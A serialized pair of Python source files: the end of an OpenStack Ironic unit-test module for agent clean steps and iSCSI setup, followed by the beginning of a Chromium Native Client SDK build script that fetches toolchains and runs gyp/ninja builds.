[obj_utils.create_test_port(self.context,\n node_id=self.node.id)]\n\n self.clean_steps = {\n \'hardware_manager_version\': \'1\',\n \'clean_steps\': {\n \'GenericHardwareManager\': [\n {\'interface\': \'deploy\',\n \'step\': \'erase_devices\',\n \'priority\': 20},\n ],\n \'SpecificHardwareManager\': [\n {\'interface\': \'deploy\',\n \'step\': \'update_firmware\',\n \'priority\': 30},\n {\'interface\': \'raid\',\n \'step\': \'create_raid\',\n \'priority\': 10},\n ]\n }\n }\n\n @mock.patch(\'ironic.objects.Port.list_by_node_id\',\n spec_set=types.FunctionType)\n @mock.patch.object(agent_client.AgentClient, \'get_clean_steps\',\n autospec=True)\n def test_get_clean_steps(self, client_mock, list_ports_mock):\n client_mock.return_value = {\n \'command_result\': self.clean_steps}\n list_ports_mock.return_value = self.ports\n\n with task_manager.acquire(\n self.context, self.node[\'uuid\'], shared=False) as task:\n response = utils.agent_get_clean_steps(task)\n client_mock.assert_called_once_with(mock.ANY, task.node,\n self.ports)\n self.assertEqual(\'1\', task.node.driver_internal_info[\n \'hardware_manager_version\'])\n\n # Since steps are returned in dicts, they have non-deterministic\n # ordering\n self.assertEqual(2, len(response))\n self.assertIn(self.clean_steps[\'clean_steps\'][\n \'GenericHardwareManager\'][0], response)\n self.assertIn(self.clean_steps[\'clean_steps\'][\n \'SpecificHardwareManager\'][0], response)\n\n @mock.patch(\'ironic.objects.Port.list_by_node_id\',\n spec_set=types.FunctionType)\n @mock.patch.object(agent_client.AgentClient, \'get_clean_steps\',\n autospec=True)\n def test_get_clean_steps_missing_steps(self, client_mock,\n list_ports_mock):\n del self.clean_steps[\'clean_steps\']\n client_mock.return_value = {\n \'command_result\': self.clean_steps}\n list_ports_mock.return_value = self.ports\n\n with task_manager.acquire(\n self.context, self.node[\'uuid\'], shared=False) as task:\n self.assertRaises(exception.NodeCleaningFailure,\n utils.agent_get_clean_steps,\n task)\n client_mock.assert_called_once_with(mock.ANY, task.node,\n self.ports)\n\n @mock.patch(\'ironic.objects.Port.list_by_node_id\',\n spec_set=types.FunctionType)\n @mock.patch.object(agent_client.AgentClient, \'execute_clean_step\',\n autospec=True)\n def test_execute_clean_step(self, client_mock, list_ports_mock):\n client_mock.return_value = {\n \'command_status\': \'SUCCEEDED\'}\n list_ports_mock.return_value = self.ports\n\n with task_manager.acquire(\n self.context, self.node[\'uuid\'], shared=False) as task:\n response = utils.agent_execute_clean_step(\n task,\n self.clean_steps[\'clean_steps\'][\'GenericHardwareManager\'][0])\n self.assertEqual(states.CLEANING, response)\n\n @mock.patch(\'ironic.objects.Port.list_by_node_id\',\n spec_set=types.FunctionType)\n @mock.patch.object(agent_client.AgentClient, \'execute_clean_step\',\n autospec=True)\n def test_execute_clean_step_running(self, client_mock, list_ports_mock):\n client_mock.return_value = {\n \'command_status\': \'RUNNING\'}\n list_ports_mock.return_value = self.ports\n\n with task_manager.acquire(\n self.context, self.node[\'uuid\'], shared=False) as task:\n response = utils.agent_execute_clean_step(\n task,\n self.clean_steps[\'clean_steps\'][\'GenericHardwareManager\'][0])\n self.assertEqual(states.CLEANING, response)\n\n @mock.patch(\'ironic.objects.Port.list_by_node_id\',\n spec_set=types.FunctionType)\n @mock.patch.object(agent_client.AgentClient, \'execute_clean_step\',\n autospec=True)\n def test_execute_clean_step_version_mismatch(self, client_mock,\n list_ports_mock):\n client_mock.return_value = {\n \'command_status\': \'RUNNING\'}\n list_ports_mock.return_value = self.ports\n\n with task_manager.acquire(\n self.context, self.node[\'uuid\'], shared=False) as task:\n response = utils.agent_execute_clean_step(\n task,\n self.clean_steps[\'clean_steps\'][\'GenericHardwareManager\'][0])\n self.assertEqual(states.CLEANING, response)\n\n\n@mock.patch.object(utils, \'is_block_device\', autospec=True)\n@mock.patch.object(utils, \'login_iscsi\', lambda *_: None)\n@mock.patch.object(utils, \'discovery\', lambda *_: None)\n@mock.patch.object(utils, \'logout_iscsi\', lambda *_: None)\n@mock.patch.object(utils, \'delete_iscsi\', lambda *_: None)\n@mock.patch.object(utils, \'get_dev\', lambda *_: \'/dev/fake\')\nclass ISCSISetupAndHandleErrorsTestCase(tests_base.TestCase):\n\n def test_no_parent_device(self, mock_ibd):\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n mock_ibd.return_value = False\n expected_dev = \'/dev/fake\'\n with testtools.ExpectedException(exception.InstanceDeployFailure):\n with utils._iscsi_setup_and_handle_errors(\n address, port, iqn, lun) as dev:\n self.assertEqual(expected_dev, dev)\n\n mock_ibd.assert_called_once_with(expected_dev)\n\n def test_parent_device_yield(self, mock_ibd):\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n expected_dev = \'/dev/fake\'\n mock_ibd.return_value = True\n with utils._iscsi_setup_and_handle_errors(address, port,\n iqn, lun) as dev:\n self.assertEqual(expected_dev, dev)\n\n mock_ibd.assert_called_once_with(expected_dev)\n', '#!/usr/bin/env python\n# Copyright (c) 2012 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n""""""Entry point for both build and try bots.\n\nThis script is invoked from XXX, usually without arguments\nto package an SDK. It automatically determines whether\nthis SDK is for mac, win, linux.\n\nThe script inspects the following environment variables:\n\nBUILDBOT_BUILDERNAME to determine whether the script is run locally\nand whether it should upload an SDK to file storage (GSTORE)\n""""""\n\n# pylint: disable=W0621\n\n# std python includes\nimport argparse\nimport datetime\nimport glob\nimport os\nimport re\nimport sys\n\nif sys.version_info < (2, 7, 0):\n sys.stderr.write(""python 2.7 or later is required run this script\\n"")\n sys.exit(1)\n\n# local includes\nimport buildbot_common\nimport build_projects\nimport build_updater\nimport build_version\nimport generate_notice\nimport manifest_util\nimport parse_dsc\nimport verify_filelist\n\nfrom build_paths import SCRIPT_DIR, SDK_SRC_DIR, SRC_DIR, NACL_DIR, OUT_DIR\nfrom build_paths import NACLPORTS_DIR, GSTORE, GONACL_APPENGINE_SRC_DIR\n\n# Add SDK make tools scripts to the python path.\nsys.path.append(os.path.join(SDK_SRC_DIR, \'tools\'))\nsys.path.append(os.path.join(NACL_DIR, \'build\'))\n\nimport getos\nimport oshelpers\n\nBUILD_DIR = os.path.join(NACL_DIR, \'build\')\nNACL_TOOLCHAIN_DIR = os.path.join(NACL_DIR, \'toolchain\')\nNACL_TOOLCHAINTARS_DIR = os.path.join(NACL_TOOLCHAIN_DIR, \'.tars\')\n\nCYGTAR = os.path.join(BUILD_DIR, \'cygtar.py\')\nPKGVER = os.path.join(BUILD_DIR, \'package_version\', \'package_version.py\')\n\nNACLPORTS_URL = \'https://chromium.googlesource.com/external/naclports.git\'\nNACLPORTS_REV = \'PI:KEY\'\n\nGYPBUILD_DIR = \'gypbuild\'\n\noptions = None\n\n# Map of: ToolchainName: (PackageName, SDKDir, arch).\nTOOLCHAIN_PACKAGE_MAP = {\n \'arm_glibc\': (\'nacl_arm_glibc\', \'%(platform)s_arm_glibc\', \'arm\'),\n \'x86_glibc\': (\'nacl_x86_glibc\', \'%(platform)s_x86_glibc\', \'x86\'),\n \'pnacl\': (\'pnacl_newlib\', \'%(platform)s_pnacl\', \'pnacl\')\n }\n\n\ndef GetToolchainDirName(tcname):\n """"""Return the directory name for a given toolchain""""""\n return TOOLCHAIN_PACKAGE_MAP[tcname][1] % {\'platform\': getos.GetPlatform()}\n\n\ndef GetToolchainDir(pepperdir, tcname):\n """"""Return the full path to a given toolchain within a given sdk root""""""\n return os.path.join(pepperdir, \'toolchain\', GetToolchainDirName(tcname))\n\n\ndef GetToolchainLibc(tcname):\n if tcname == \'pnacl\':\n return \'newlib\'\n for libc in (\'glibc\', \'newlib\', \'host\'):\n if libc in tcname:\n return libc\n\n\ndef GetToolchainNaClInclude(pepperdir, tcname, arch=None):\n tcpath = GetToolchainDir(pepperdir, tcname)\n if arch is None:\n arch = TOOLCHAIN_PACKAGE_MAP[tcname][2]\n if arch == \'x86\':\n return os.path.join(tcpath, \'x86_64-nacl\', \'include\')\n elif arch == \'pnacl\':\n return os.path.join(tcpath, \'le32-nacl\', \'include\')\n elif arch == \'arm\':\n return os.path.join(tcpath, \'arm-nacl\', \'include\')\n else:\n buildbot_common.ErrorExit(\'Unknown architecture: %s\' % arch)\n\n\ndef GetConfigDir(arch):\n if arch.endswith(\'x64\') and getos.GetPlatform() == \'win\':\n return \'Release_x64\'\n else:\n return \'Release\'\n\n\ndef GetNinjaOutDir(arch):\n return os.path.join(OUT_DIR, GYPBUILD_DIR + \'-\' + arch, GetConfigDir(arch))\n\n\ndef GetGypBuiltLib(tcname, arch):\n if arch == \'ia32\':\n lib_suffix = \'32\'\n elif arch == \'x64\':\n lib_suffix = \'64\'\n elif arch == \'arm\':\n lib_suffix = \'arm\'\n else:\n lib_suffix = \'\'\n\n tcdir = \'tc_\' + GetToolchainLibc(tcname)\n\n if tcname == \'pnacl\':\n if arch is None:\n lib_suffix = \'\'\n tcdir = \'tc_pnacl_newlib\'\n arch = \'x64\'\n else:\n arch = \'clang-\' + arch\n\n return os.path.join(GetNinjaOutDir(arch), \'gen\', tcdir, \'lib\' + lib_suffix)\n\n\ndef GetToolchainNaClLib(tcname, tcpath, arch):\n if arch == \'ia32\':\n return os.path.join(tcpath, \'x86_64-nacl\', \'lib32\')\n elif arch == \'x64\':\n return os.path.join(tcpath, \'x86_64-nacl\', \'lib\')\n elif arch == \'arm\':\n return os.path.join(tcpath, \'arm-nacl\', \'lib\')\n elif tcname == \'pnacl\':\n return os.path.join(tcpath, \'le32-nacl\', \'lib\')\n\n\n\ndef GetOutputToolchainLib(pepperdir, tcname, arch):\n tcpath = os.path.join(pepperdir, \'toolchain\', GetToolchainDirName(tcname))\n return GetToolchainNaClLib(tcname, tcpath, arch)\n\n\ndef GetPNaClTranslatorLib(tcpath, arch):\n if arch not in [\'arm\', \'x86-32\', \'x86-64\']:\n buildbot_common.ErrorExit(\'Unknown architecture %s.\' % arch)\n return os.path.join(tcpath, \'translator\', arch, \'lib\')\n\n\ndef BuildStepDownloadToolchains(toolchains):\n buildbot_common.BuildStep(\'Running package_version.py\')\n args = [sys.executable, PKGVER, \'--mode\', \'nacl_core_sdk\']\n args.extend([\'sync\', \'--extract\'])\n buildbot_common.Run(args, cwd=NACL_DIR)\n\n\ndef BuildStepCleanPepperDirs(pepperdir, pepperdir_old):\n buildbot_common.BuildStep(\'Clean Pepper Dirs\')\n dirs_to_remove = (\n pepperdir,\n pepperdir_old,\n os.path.join(OUT_DIR, \'arm_trusted\')\n )\n for dirname in dirs_to_remove:\n if os.path.exists(dirname):\n buildbot_common.RemoveDir(dirname)\n buildbot_common.MakeDir(pepperdir)\n\n\ndef BuildStepMakePepperDirs(pepperdir, subdirs):\n for subdir in subdirs:\n buildbot_common.MakeDir(os.path.join(pepperdir, subdir))\n\nTEXT_FILES = [\n \'AUTHORS\',\n \'COPYING\',\n \'LICENSE\',\n \'README.Makefiles\',\n \'getting_started/README\',\n]\n\ndef BuildStepCopyTextFiles(pepperdir, pepper_ver, chrome_revision,\n nacl_revision):\n buildbot_common.BuildStep(\'Add Text Files\')\n InstallFiles(SDK_SRC_DIR, pepperdir, TEXT_FILES)\n\n # Replace a few placeholders in README\n readme_text = open(os.path.join(SDK_SRC_DIR, \'README\')).read()\n readme_text = readme_text.replace(\'${VERSION}\', pepper_ver)\n readme_text = readme_text.replace(\'${CHROME_REVISION}\', chrome_revision)\n readme_text = readme_text.replace(\'${CHROME_COMMIT_POSITION}\',\n build_version.ChromeCommitPosition())\n readme_text = readme_text.replace(\'${NACL_REVISION}\', nacl_revision)\n\n # Year/Month/Day Hour:Minute:Second\n time_format = \'%Y/%m/%d %H:%M:%S\'\n readme_text = readme_text.replace(\'${DATE}\',\n datetime.datetime.now().strftime(time_format))\n\n open(os.path.join(pepperdir, \'README\'), \'w\').write(readme_text)\n\n\ndef BuildStepUntarToolchains(pepperdir, toolchains):\n buildbot_common.BuildStep(\'Untar Toolchains\')\n platform = getos.GetPlatform()\n build_platform = \'%s_x86\' % platform\n tmpdir = os.path.join(OUT_DIR, \'tc_temp\')\n buildbot_common.RemoveDir(tmpdir)\n buildbot_common.MakeDir(tmpdir)\n\n # Create a list of extract packages tuples, the first part should be\n # ""$PACKAGE_TARGET/$PACKAGE"". The second part should be the destination\n # directory relative to pepperdir/toolchain.\n extract_packages = []\n for toolchain in toolchains:\n toolchain_map = TOOLCHAIN_PACKAGE_MAP.get(toolchain, None)\n if toolchain_map:\n package_name, tcdir, _ = toolchain_map\n package_tuple = (os.path.join(build_platform, package_name),\n tcdir % {\'platform\': platform})\n extract_packages.append(package_tuple)\n\n\n # On linux we also want to extract the arm_trusted package which contains\n # the ARM libraries we ship in support of sel_ldr_arm.\n if platform == \'linux\':\n extract_packages.append((os.path.join(build_platform, \'arm_trusted\'),\n \'arm_trusted\'))\n if extract_packages:\n # Extract all of the packages into the temp directory.\n package_names = [package_tuple[0] for package_tuple in extract_packages]\n buildbot_common.Run([sys.executable, PKGVER,\n \'--packages\', \',\'.join(package_names),\n \'--tar-dir\', NACL_TOOLCHAINTARS_DIR,\n \'--dest-dir\', tmpdir,\n \'extract\'])\n\n # Move all the packages we extracted to the correct destination.\n for package_name, dest_dir in extract_packages:\n full_src_dir = os.path.join(tmpdir, package_name)\n full_dst_dir = os.path.join(pepperdir, \'toolchain\', dest_dir)\n buildbot_common.Move(full_src_dir, full_dst_dir)\n\n # Cleanup the temporary directory we are no longer using.\n buildbot_common.RemoveDir(tmpdir)\n\n\n# List of toolchain headers to install.\n# Source is relative to top of Chromium tree, destination is relative\n# to the toolchain header directory.\nNACL_HEADER_MAP = {\n \'newlib\': [\n (\'native_client/src/include/nacl/nacl_exception.h\', \'nacl/\'),\n (\'native_client/src/include/nacl/nacl_minidump.h\', \'nacl/\'),\n (\'native_client/src/untrusted/irt/irt.h\', \'\'),\n (\'native_client/src/untrusted/irt/irt_dev.h\', \'\'),\n (\'native_client/src/untrusted/irt/irt_extension.h\', \'\'),\n (\'native_client/src/untrusted/nacl/nacl_dyncode.h\', \'nacl/\'),\n (\'native_client/src/untrusted/nacl/nacl_startup.h\', \'nacl/\'),\n (\'native_client/src/untrusted/pthread/pthread.h\', \'\'),\n (\'native_client/src/untrusted/pthread/semaphore.h\', \'\'),\n (\'native_client/src/untrusted/valgrind/dynamic_annotations.h\', \'nacl/\'),\n (\'ppapi/nacl_irt/public/irt_ppapi.h\', \'\'),\n ],\n \'glibc\': [\n (\'native_client/src/include/nacl/nacl_exception.h\', \'nacl/\'),\n (\'native_client/src/include/nacl/nacl_minidump.h\', \'nacl/\'),\n (\'native_client/src/untrusted/irt/irt.h\', \'\'),\n (\'native_client/src/untrusted/irt/irt_dev.h\', \'\'),\n (\'native_client/src/untrusted/irt/irt_extension.h\', \'\'),\n (\'native_client/src/untrusted/nacl/nacl_dyncode.h\', \'nacl/\'),\n (\'native_client/src/untrusted/nacl/nacl_startup.h\', \'nacl/\'),\n (\'native_client/src/untrusted/valgrind/dynamic_annotations.h\', \'nacl/\'),\n (\'ppapi/nacl_irt/public/irt_ppapi.h\', \'\'),\n ],\n}\n\ndef InstallFiles(src_root, dest_root, file_list):\n """"""Copy a set of files from src_root to dest_root according\n to the given mapping. This allows files to be copied from\n to a location in the destination tree that is different to the\n location in the source tree.\n\n If the destination mapping ends with a \'/\' then the destination\n basename is inherited from the the source file.\n\n Wildcards can be used in the source list but it is not recommended\n as this can end up adding things to the SDK unintentionally.\n """"""\n for file_spec in file_list:\n # The list of files to install can be a simple list of\n # strings or a list of pairs, where each pair corresponds\n # to a mapping from source to destination names.\n if type(file_spec) == str:\n src_file = dest_file = file_spec\n else:\n src_file, dest_file = file_spec\n\n src_file = os.path.join(src_root, src_file)\n\n # Expand sources files using glob.\n sources = glob.glob(src_file)\n if not sources:\n sources = [src_file]\n\n if len(sources) > 1 and not dest_file.endswith(\'/\'):\n buildbot_common.ErrorExit(""Target file must end in \'/\' when ""\n ""using globbing to install multiple files"")\n\n for source in sources:\n if dest_file.endswith(\'/\'):\n dest = os.path.join(dest_file, os.path.basename(source))\n else:\n dest = dest_file\n dest = os.path.join(dest_root, dest)\n if not os.path.isdir(os.path.dirname(dest)):\n buildbot_common.MakeDir(os.path.dirname(dest))\n buildbot_common.CopyFile(source, dest)\n\n\ndef InstallNaClHeaders(tc_dst_inc, tcname):\n """"""Copies NaCl headers to expected locations in the toolchain.""""""\n InstallFiles(SRC_DIR, tc_dst_inc, NACL_HEADER_MAP[GetToolchainLibc(tcname)])\n\n\ndef MakeNinjaRelPath(path):\n return os.path.join(os.path.relpath(OUT_DIR, SRC_DIR), path)\n\n\n# TODO(ncbray): stop building and copying libraries into the SDK that are\n# already provided by the toolchain.\n# Mapping from libc to libraries gyp-build trusted libraries\nTOOLCHAIN_LIBS = {\n \'newlib\' : [\n \'libminidump_generator.a\',\n \'libnacl.a\',\n \'libnacl_dyncode.a\',\n \'libnacl_exception.a\',\n \'libnacl_list_mappings.a\',\n \'libnosys.a\',\n \'libppapi.a\',\n \'libppapi_stub.a\',\n \'libpthread.a\',\n ],\n \'glibc\': [\n \'libminidump_generator.a\',\n \'libminidump_generator.so\',\n \'libnacl.a\',\n \'libnacl_dyncode.a\',\n \'libnacl_dyncode.so\',\n \'libnacl_exception.a\',\n \'libnacl_exception.so\',\n \'libnacl_list_mappings.a\',\n \'libnacl_list_mappings.so\',\n \'libppapi.a\',\n \'libppapi.so\',\n \'libppapi_stub.a\',\n ]\n}\n\n\ndef GypNinjaInstall(pepperdir, toolchains):\n tools_files_32 = [\n [\'sel_ldr\', \'sel_ldr_x86_32\'],\n [\'irt_core_newlib_x32.nexe\', \'irt_core_x86_32.nexe\'],\n [\'irt_core_newlib_x64.nexe\', \'irt_core_x86_64.nexe\'],\n ]\n arm_files = [\n [\'elf_loader_newlib_arm.nexe\', \'elf_loader_arm.nexe\'],\n ]\n\n tools_files_64 = []\n\n platform = getos.GetPlatform()\n\n # TODO(binji): dump_syms doesn\'t currently build on Windows. See\n # http://crbug.com/245456\n if platform != \'win\':\n tools_files_64 += [\n [\'dump_syms\', \'dump_syms\'],\n [\'minidump_dump\', \'minidump_dump\'],\n [\'minidump_stackwalk\', \'minidump_stackwalk\']\n ]\n\n tools_files_64.append([\'sel_ldr\', \'sel_ldr_x86_64\'])\n tools_files_64.append([\'ncval_new\', \'ncval\'])\n\n if platform == \'linux\':\n tools_files_32.append([\'nacl_helper_bootstrap\',\n \'nacl_helper_bootstrap_x86_32\'])\n tools_files_64.append([\'nacl_helper_bootstrap\',\n \'nacl_helper_bootstrap_x86_64\'])\n tools_files_32.append([\'nonsfi_loader_newlib_x32_nonsfi.nexe\',\n \'nonsfi_loader_x86_32\'])\n\n tools_dir = os.path.join(pepperdir, \'tools\')\n buildbot_common.MakeDir(tools_dir)\n\n # Add .exe extensions to all windows tools\n for pair in tools_files_32 + tools_files_64:\n if platform == \'win\' and not pair[0].endswith(\'.nexe\'):\n pair[0] += \'.exe\'\n pair[1] += \'.exe\'\n\n # Add ARM binaries\n if platform == \'linux\' and not options.no_arm_trusted:\n arm_files += [\n [\'irt_core_newlib_arm.nexe\', \'irt_core_arm.nexe\'],\n [\'nacl_helper_bootstrap\', \'nacl_helper_bootstrap_arm\'],\n [\'nonsfi_loader_newlib_arm_nonsfi.nexe\', \'nonsfi_loader_arm\'],\n [\'sel_ldr\', \'sel_ldr_arm\']\n ]\n\n InstallFiles(GetNinjaOutDir(\'x64\'), tools_dir, tools_files_64)\n InstallFiles(GetNinjaOutDir(\'ia32\'), tools_dir, tools_files_32)\n InstallFiles(GetNinjaOutDir(\'arm\'), tools_dir, arm_files)\n\n for tc in toolchains:\n if tc in (\'host\', \'clang-newlib\'):\n continue\n elif tc == \'pnacl\':\n xarches = (None, \'ia32\', \'x64\', \'arm\')\n elif tc in (\'x86_glibc\', \'x86_newlib\'):\n xarches = (\'ia32\', \'x64\')\n elif tc == \'arm_glibc\':\n xarches = (\'arm\',)\n else:\n raise AssertionError(\'unexpected toolchain value: %s\' % tc)\n\n for xarch in xarches:\n src_dir = GetGypBuiltLib(tc, xarch)\n dst_dir = GetOutputToolchainLib(pepperdir, tc, xarch)\n libc = GetToolchainLibc(tc)\n InstallFiles(src_dir, dst_dir, TOOLCHAIN_LIBS[libc])\n\n\ndef GypNinjaBuild_NaCl(rel_out_dir):\n gyp_py = os.path.join(NACL_DIR, \'build\', \'gyp_nacl\')\n nacl_core_sdk_gyp = os.path.join(NACL_DIR, \'build\', \'nacl_core_sdk.gyp\')\n all_gyp = os.path.join(NACL_DIR, \'build\', \'all.gyp\')\n\n out_dir_32 = MakeNinjaRelPath(rel_out_dir + \'-ia32\')\n out_dir_64 = MakeNinjaRelPath(rel_out_dir + \'-x64\')\n out_dir_arm = MakeNinjaRelPath(rel_out_dir + \'-arm\')\n out_dir_clang_32 = MakeNinjaRelPath(rel_out_dir + \'-clang-ia32\')\n out_dir_clang_64 = MakeNinjaRelPath(rel_out_dir + \'-clang-x64\')\n out_dir_clang_arm = MakeNinjaRelPath(rel_out_dir + \'-clang-arm\')\n\n GypNinjaBuild(\'ia32\', gyp_py, nacl_core_sdk_gyp, \'nacl_core_sdk\', out_dir_32,\n gyp_defines=[\'use_nacl_clang=0\'])\n GypNinjaBuild(\'x64\', gyp_py, nacl_core_sdk_gyp, \'nacl_core_sdk\', out_dir_64,\n gyp_defines=[\'use_nacl_clang=0\'])\n GypNinjaBuild(\'arm\', gyp_py, nacl_core_sdk_gyp, \'nacl_core_sdk\', out_dir_arm,\n gyp_defines=[\'use_nacl_clang=0\'])\n GypNinjaBuild(\'ia32\', gyp_py, nacl_core_sdk_gyp, \'nacl_core_sdk\',\n out_dir_clang_32, gyp_defines=[\'use_nacl_clang=1\'])\n GypNinjaBuild(\'x64\', gyp_py, nacl_core_sdk_gyp, \'nacl_core_sdk\',\n out_dir_clang_64, gyp_defines=[\'use_nacl_clang=1\'])\n GypNinjaBuild(\'arm\', gyp_py, nacl_core_sdk_gyp, \'nacl_core_sdk\',\n out_dir_clang_arm, gyp_defines=[\'use_nacl_clang=1\'])\n GypNinjaBuild(\'x64\', gyp_py, all_gyp, \'ncval_new\', out_dir_64)\n\n\ndef GypNinjaBuild_Breakpad(rel_out_dir):\n # TODO(binji): dump_syms doesn\'t currently build on Windows. See\n # http://crbug.com/245456\n if getos.GetPlatform() == \'win\':\n return\n\n gyp_py = os.path.join(SRC_DIR, \'build\', \'gyp_chromium\')\n out_dir = MakeNinjaRelPath(rel_out_dir)\n gyp_file = os.path.join(SRC_DIR, \'breakpad\', \'breakpad.gyp\')\n build_list = [\'dump_syms\', \'minidump_dump\', \'minidump_stackwalk\']\n GypNinjaBuild(\'x64\', gyp_py, gyp_file, build_list, out_dir)\n\n\ndef GypNinjaBuild_PPAPI(arch, rel_out_dir, gyp_defines=None):\n gyp_py = os.path.join(SRC_DIR, \'build\', \'gyp_chromium\')\n out_dir = MakeNinjaRelPath(rel_out_dir)\n gyp_file = os.path.join(SRC_DIR, \'ppapi\', \'native_client\',\n \'native_client.gyp\')\n GypNinjaBuild(arch, gyp_py, gyp_file, \'ppapi_lib\', out_dir,\n gyp_defines=gyp_defines)\n\n\ndef GypNinjaBuild_Pnacl(rel_out_dir, target_arch):\n # TODO(binji): This will build the pnacl_irt_shim twice; once as part of the\n # Chromium build, and once here. When we move more of the SDK build process\n # to gyp, we can remove this.\n gyp_py = os.path.join(SRC_DIR, \'build\', \'gyp_chromium\')\n\n out_dir = MakeNinjaRelPath(rel_out_dir)\n gyp_file = os.path.join(SRC_DIR, \'ppapi\', \'native_client\', \'src\',\n \'untrusted\', \'pnacl_irt_shim\', \'pnacl_irt_shim.gyp\')\n targets = [\'aot\']\n GypNinjaBuild(target_arch, gyp_py, gyp_file, targets, out_dir)\n\n\ndef GypNinjaBuild(arch, gyp_py_script, gyp_file, targets,\n out_dir, gyp_defines=None):\n gyp_env = dict(os.environ)\n gyp_env[\'GYP_GENERATORS\'] = \'ninja\'\n gyp_defines = gyp_defines or []\n gyp_defines.append(\'nacl_allow_thin_archives=0\')\n if not options.no_use_sysroot:\n gyp_defines.append(\'use_sysroot=1\')\n if options.mac_sdk:\n gyp_defines.append(\'mac_sdk=%s\' % options.mac_sdk)\n\n if arch is not None:\n gyp_defines.append(\'target_arch=%s\' % arch)\n if arch == \'arm\':\n gyp_env[\'GYP_CROSSCOMPILE\'] = \'1\'\n if options.no_arm_trusted:\n gyp_defines.append(\'disable_cross_trusted=1\')\n if getos.GetPlatform() == \'mac\':\n gyp_defines.append(\'clang=1\')\n\n gyp_env[\'GYP_DEFINES\'] = \' \'.join(gyp_defines)\n # We can\'t use windows path separators in GYP_GENERATOR_FLAGS since\n # gyp uses shlex to parse them and treats \'\\\' as an escape char.\n gyp_env[\'GYP_GENERATOR_FLAGS\'] = \'output_dir=%s\' % out_dir.replace(\'\\\\\', \'/\')\n\n # Print relevant environment variables\n for key, value in gyp_env.iteritems():\n if key.startswith(\'GYP\') or key in (\'CC\',):\n print \' %s=""%s""\' % (key, value)\n\n buildbot_common.Run(\n [sys.executable, gyp_py_script, gyp_file, \'--depth=.\'],\n cwd=SRC_DIR,\n env=gyp_env)\n\n NinjaBuild(targets, out_dir, arch)\n\n\ndef NinjaBuild(targets, out_dir, arch):\n if type(targets) is not list:\n targets = [targets]\n out_config_dir = os.path.join(out_dir, GetConfigDir(arch))\n buildbot_common.Run([\'ninja\', \'-C\', out_config_dir] + targets, cwd=SRC_DIR)\n\n\ndef BuildStepBuildToolchains(pepperdir, toolchains, build, clean):\n buildbot_common.BuildStep(\'SDK Items\')\n\n if clean:\n for dirname in glob.glob(os.path.join(OUT_DIR, GYPBUILD_DIR + \'*\')):\n buildbot_common.RemoveDir(dirname)\n build = True\n\n if build:\n GypNinjaBuild_NaCl(GYPBUILD_DIR)\n GypNinjaBuild_Breakpad(GYPBUILD_DIR + \'-x64\')\n\n if set(toolchains) & set([\'x86_glibc\', \'x86_newlib\']):\n GypNinjaBuild_PPAPI(\'ia32\', GYPBUILD_DIR + \'-ia32\',\n [\'use_nacl_clang=0\'])\n GypNinjaBuild_PPAPI(\'x64\', GYPBUILD_DIR + \'-x64\',\n [\'use_nacl_clang=0\'])\n\n if \'arm_glibc\' in toolchains:\n GypNinjaBuild_PPAPI(\'arm\', GYPBUILD_DIR + \'-arm\',\n [\'use_nacl_clang=0\'] )\n\n if \'pnacl\' in toolchains:\n GypNinjaBuild_PPAPI(\'ia32\', GYPBUILD_DIR + \'-clang-ia32\',\n [\'use_nacl_clang=1\'])\n GypNinjaBuild_PPAPI(\'x64\', GYPBUILD_DIR + \'-clang-x64\',\n [\'use_nacl_clang=1\'])\n GypNinjaBuild_PPAPI(\'arm\', GYPBUILD_DIR + \'-clang-arm\',\n [\'use_nacl_clang=1\'])\n\n # NOTE: For ia32, gyp builds both x86-32 and x86-64 by default.\n for arch in (\'ia32\', \'arm\'):\n # Fill in the latest native pnacl shim library from the chrome build.\n build_dir = GYPBUILD_DIR + \'-pnacl-\' + arch\n GypNinjaBuild_Pnacl(build_dir, arch)\n\n GypNinjaInstall(pepperdir, toolchains)\n\n for toolchain in toolchains:\n if toolchain not in (\'host\', \'clang-newlib\'):\n InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, toolchain),\n toolchain)\n\n\n if \'pnacl\' in toolchains:\n # NOTE: For ia32, gyp builds both x86-32 and x86-64 by default.\n for arch in (\'ia32\', \'arm\'):\n # Fill in the latest native pnacl shim library from the chrome build.\n build_dir = GYPBUILD_DIR + \'-pnacl-\' + arch\n if arch == \'ia32\':\n nacl_arches = [\'x86-32\', \'x86-64\']\n elif arch == \'arm\':\n nacl_arches = [\'arm\']\n else:\n buildbot_common.ErrorExit(\'Unknown architecture: %s\' % arch)\n for nacl_arch in nacl_arches:\n release_build_dir = os.path.join(OUT_DIR, build_dir, \'Release\',\n \'gen\', \'tc_pnacl_translate\',\n \'lib-\' + nacl_arch)\n\n pnacldir = GetToolchainDir(pepperdir, \'pnacl\')\n pnacl_translator_lib_dir = GetPNaClTranslatorLib(pnacldir, nacl_arch)\n if not os.path.isdir(pnacl_translator_lib_dir):\n buildbot_common.ErrorExit(\'Expected %s directory to exist.\' %\n pnacl_translator_lib_dir)\n\n buildbot_common.CopyFile(\n os.path.join(release_build_dir, \'libpnacl_irt_shim.a\'),\n pnacl_translator_lib_dir)\n\n InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, \'pnacl\', \'x86\'),\n \'pnacl\')\n InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, \'pnacl\', \'arm\'),\n \'pnacl\')\n\n\ndef MakeDirectoryOrClobber(pepperdir, dirname, clobber):\n dirpath = os.path.join(pepperdir, dirname)\n if clobber:\n buildbot_common.RemoveDir(dirpath)\n buildbot_common.MakeDir(dirpath)\n\n return dirpath\n\n\ndef BuildStepUpdateHelpers(pepperdir, clobber):\n buildbot_common.BuildStep(\'Update project helpers\')\n build_projects.UpdateHelpers(pepperdir, clobber=clobber)\n\n\ndef BuildStepUpdateUserProjects(pepperdir, toolchains,\n build_experimental, clobber):\n buildbot_common.BuildStep(\'Update examples and libraries\')\n\n filters = {}\n if not build_experimental:\n filters[\'EXPERIMENTAL\'] = False\n\n dsc_toolchains = []\n for t in toolchains:\n if t.startswith(\'x86_\') or t.startswith(\'arm_\'):\n if t[4:] not in dsc_toolchains:\n dsc_toolchains.append(t[4:])\n elif t == \'host\':\n dsc_toolchains.append(getos.GetPlatform())\n else:\n dsc_toolchains.append(t)\n\n filters[\'TOOLS\'] = dsc_toolchains\n\n # Update examples and libraries\n filters[\'DEST\'] = [\n \'getting_started\',\n \'examples/api\',\n 